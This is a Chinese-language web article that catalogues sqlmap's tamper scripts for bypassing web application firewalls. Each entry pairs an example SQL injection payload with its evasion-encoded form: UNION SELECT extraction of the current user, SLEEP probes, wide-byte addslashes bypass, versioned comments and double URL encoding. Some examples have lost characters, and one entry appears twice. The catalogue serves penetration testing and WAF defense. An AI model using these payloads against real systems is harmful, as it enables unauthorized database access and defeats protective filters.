频道栏目
首页 > 资讯 > 网络安全 > 正文

扒一扒sqlmap中tamper目录中的waf绕过脚本们

16-08-25        来源:[db:作者]  
收藏   我要投稿

1.工具简介

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。sqlmap中有一个tamper目录,主要存放的是waf绕过脚本,比如:base64encode.py、between.py、greatest.py等。

2.tamper目录脚本介绍

 

logo.png

 

脚本名:apostrophemask.py

作用:用utf8代替引号

Example:

("1 AND '1'='1")

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested against:

all

—————————————————————————————

文件名:equaltolike.py

作用:like 代替等号

Example:

* Input: SELECT * FROM users WHERE id=1

* Output: SELECT * FROM users WHERE id LIKE 1

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

—————————————————————————————

脚本名:space2dash.py

作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

Example:

('1 AND 9227=9227')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Tested against:

* MSSQL

* SQLite

—————————————————————————————

脚本名:greatest.py

作用:绕过过滤’>’ ,用GREATEST替换大于号。

Example:

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

—————————————————————————————

脚本名:space2hash.py

作用:空格替换为#号 随机字符串 以及换行符

Example:

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL

Tested against:

* MySQL 4.0, 5.0

—————————————————————————————

脚本名:apostrophenullencode.py

作用:绕过过滤双引号,替换字符和双引号。

Example:

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

—————————————————————————————

脚本名:halfversionedmorekeywords.py

作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

Example:

("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

—————————————————————————————

脚本名:space2morehash.py

作用:空格替换为 #号 以及更多随机字符串 换行符

Example:

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL >= 5.1.13

Tested against:

* MySQL 5.1.41

—————————————————————————————

脚本名:appendnullbyte.py

作用:在有效负荷结束位置加载零字节字符编码

Example:

('1 AND 1=1')

'1 AND 1=1%00'

Requirement:

* Microsoft Access

—————————————————————————————

脚本名:ifnull2ifisnull.py

作用:绕过对 IFNULL 过滤。

替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

Example:

('IFNULL(1, 2)')

'IF(ISNULL(1),2,1)'

Requirement:

* MySQL

* SQLite (possibly)

* SAP MaxDB (possibly)

Tested against:

* MySQL 5.0 and 5.5

—————————————————————————————

脚本名:space2mssqlblank.py(mssql)

作用:空格替换为其它空符号

Example:

* Input: SELECT id FROM users

* Output: SELECT%08id%02FROM%0Fusers

Requirement:

* Microsoft SQL Server

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

# ASCII table:

# SOH 01 start of heading

# STX 02 start of text

# ETX 03 end of text

# EOT 04 end of transmission

# ENQ 05 enquiry

# ACK 06 acknowledge

# BEL 07 bell

# BS 08 backspace

# TAB 09 horizontal tab

# LF 0A new line

# VT 0B vertical TAB

# FF 0C new page

# CR 0D carriage return

# SO 0E shift out

# SI 0F shift in

—————————————————————————————

脚本名:base64encode.py

作用:用base64编码替换

Example:

("1' AND SLEEP(5)#")

'MScgQU5EIFNMRUVQKDUpIw=='

Requirement:

all

—————————————————————————————

脚本名:space2mssqlhash.py

作用:替换空格

Example:

('1 AND 9227=9227')

'1%23%0AAND%23%0A9227=9227'

Requirement:

* MSSQL

* MySQL

—————————————————————————————

脚本名:modsecurityversioned.py

作用:过滤空格,包含完整的查询版本注释

Example:

('1 AND 2>1--')

'1 /*!30874AND 2>1*/--'

Requirement:

* MySQL

Tested against:

* MySQL 5.0

—————————————————————————————

脚本名:space2mysqlblank.py

作用:空格替换其它空白符号(mysql)

Example:

* Input: SELECT id FROM users

* Output: SELECT%0Bid%0BFROM%A0users

Requirement:

* MySQL

Tested against:

* MySQL 5.1

# TAB 09 horizontal TAB

# LF 0A new line

# FF 0C new page

# CR 0D carriage return

# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)

# - A0 - (MySQL only)

—————————————————————————————

脚本名:between.py

作用:用between替换大于号(>)

Example:

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

—————————————————————————————

脚本名:modsecurityzeroversioned.py

作用:包含了完整的查询与零版本注释

Example:

('1 AND 2>1--')

'1 /*!00000AND 2>1*/--'

Requirement:

* MySQL

Tested against:

* MySQL 5.0

—————————————————————————————

脚本名:space2mysqldash.py

作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的

Example:

('1 AND 9227=9227')

'1--%0AAND--%0A9227=9227'

Requirement:

* MySQL

* MSSQL

—————————————————————————————

脚本名:multiplespaces.py

作用:围绕SQL关键字添加多个空格

Example:

('1 UNION SELECT foobar')

'1 UNION SELECT foobar'

Tested against:

all

—————————————————————————————

脚本名:space2plus.py

作用:用+替换空格

Example:

('SELECT id FROM users')

'SELECT+id+FROM+users'

Tested against:

all

—————————————————————————————

脚本名:bluecoat.py

作用:代替空格字符后与一个有效的随机空白字符的SQL语句。

然后替换=为like

Example:

('SELECT id FROM users where id = 1')

'SELECT%09id FROM users where id LIKE 1'

Tested against:

* MySQL 5.1, SGOS

—————————————————————————————

脚本名:nonrecursivereplacement.py

双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

Example:

('1 UNION SELECT 2--')

'1 UNIOUNIONN SELESELECTCT 2--'

Tested against:

all

—————————————————————————————

脚本名:space2randomblank.py

作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

Example:

('SELECT id FROM users')

'SELECT%0Did%0DFROM%0Ausers'

Tested against:

all

—————————————————————————————

脚本名:percentage.py

作用:asp允许每个字符前面添加一个%号

Example:

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

—————————————————————————————

脚本名:sp_password.py

作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example:

('1 AND 9227=9227-- ')

'1 AND 9227=9227-- sp_password'

Requirement:

* MSSQL

—————————————————————————————

脚本名:chardoubleencode.py 双url编码(不处理以编码的)

Example:

* Input: SELECT FIELD FROM%20TABLE

* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

—————————————————————————————

脚本名:unionalltounion.py

作用:替换UNION ALL SELECT UNION SELECT

Example:

('-1 UNION ALL SELECT')

'-1 UNION SELECT'

Requirement:

all

—————————————————————————————

脚本名:charencode.py

作用:url编码

Example:

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset

The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS

—————————————————————————————

脚本名:randomcase.py

作用:随机大小写

Example:

* Input: INSERT

* Output: InsERt

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

—————————————————————————————

脚本名:unmagicquotes.py

作用:宽字符绕过 GPC addslashes

Example:

* Input: 1′ AND 1=1

* Output: 1%bf%27 AND 1=1–%20

Notes:

Useful for bypassing magic_quotes/addslashes feature

—————————————————————————————

脚本名:randomcomments.py

作用:用/**/分割sql关键字

Example:

‘INSERT’ becomes ‘IN//S//ERT’

—————————————————————————————

脚本名:versionedkeywords.py

作用:Encloses each non-function keyword with versioned MySQL comment

Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:

* MySQL

—————————————————————————————

脚本名:charunicodeencode.py

作用:字符串 unicode 编码

Example:

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

* ASP

* ASP.NET

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

* MySQL 5.1.56

* PostgreSQL 9.0.3

Notes:

Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset

—————————————————————————————

脚本名:securesphere.py

作用:追加特制的字符串

Example:

('1 AND 1=1')

"1 AND 1=1 and '0having'='0having'"

Tested against:

all

—————————————————————————————

脚本名:versionedmorekeywords.py

作用:注释绕过

Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

* MySQL >= 5.1.13

—————————————————————————————

脚本名:space2comment.py

作用:Replaces space character (‘ ‘) with comments ‘/**/’

Example:

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

Useful to bypass weak and bespoke web application firewalls

—————————————————————————————

脚本名:halfversionedmorekeywords.py

作用:关键字前加注释

Example:

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

—————————————————————————————

相关TAG标签
上一篇:burpsuit实现web登录破解-安全防御知识
下一篇:关于Chrome V8引擎“BadKernel”漏洞情况的通报
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站